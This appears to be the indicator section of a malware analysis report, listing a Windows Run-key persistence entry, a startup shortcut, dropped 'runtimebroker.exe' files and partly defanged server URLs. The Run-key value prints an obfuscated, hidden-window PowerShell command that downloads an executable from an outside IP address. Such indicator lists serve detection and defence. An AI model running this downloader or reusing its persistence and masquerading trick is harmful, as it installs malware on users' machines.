Technical information
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'Sound device' = 'Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile(('http://193.56.146.55/Ru'+'nt...
- %APPDATA%\microsoft\windows\start menu\programs\startup\sound device.lnk
- (http://19#.#6.146.55/ru+nti+m+ebr+oke+r.exe
- http://19#.#6.146.55/api/getfile2
- %ALLUSERSPROFILE%\runtimebroker.exe
- %ALLUSERSPROFILE%\runtimebroker_new.exe
- %ALLUSERSPROFILE%\runtimebroker.exe
- %ALLUSERSPROFILE%\runtimebroker_new.exe
- %ALLUSERSPROFILE%\runtimebroker.exe
- '19#.#6.146.55':80
- http://19#.#6.146.55/Api/GetFile3
- '%ALLUSERSPROFILE%\runtimebroker.exe'
- '%ALLUSERSPROFILE%\runtimebroker_new.exe'
- '%ALLUSERSPROFILE%\runtimebroker.exe' ' (with hidden window)
- '%ALLUSERSPROFILE%\runtimebroker_new.exe' ' (with hidden window)